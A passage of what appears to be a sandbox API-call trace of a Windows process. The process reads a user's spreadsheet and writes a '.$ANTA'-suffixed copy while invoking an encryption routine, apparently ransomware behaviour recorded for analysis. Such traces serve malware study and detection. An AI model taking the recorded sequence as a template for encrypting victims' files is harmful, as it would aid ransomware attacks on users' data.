HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0083.156] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\ul2gt2lt.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0083.157] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.157] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0083.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0083.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0083.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.158] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0083.158] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0083.158] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0083.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0083.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0083.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0083.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43eccd8 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eccd8 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0083.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0083.160] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0083.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0083.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0083.161] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\ul2gt2lt.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0083.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0083.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0083.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0083.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0083.162] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0083.162] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0083.162] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0083.162] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0083.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0083.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0083.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0083.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0083.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0083.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0083.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0083.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0083.167] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0083.167] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x10000, lpOverlapped=0x0) returned 1 [0083.169] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x4a89, lpOverlapped=0x0) returned 1 [0083.170] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0083.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0083.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0083.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0083.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14a89) returned 0x49aa010 [0083.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0083.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0083.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0083.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0083.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0083.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14a89) returned 0x49beaa8 [0083.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0083.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.174] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14a89) returned 0x49aa010 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.175] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0083.175] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0083.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0083.176] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0083.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0083.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0083.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c70 [0083.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0083.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0083.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0083.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0083.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14a89) returned 0x49aa010 [0083.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2bf0 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0083.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c80 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2bd0 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb420 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14a89) returned 0x49d3540 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0083.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0083.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0083.178] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac9c0 [0083.178] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0083.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0083.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 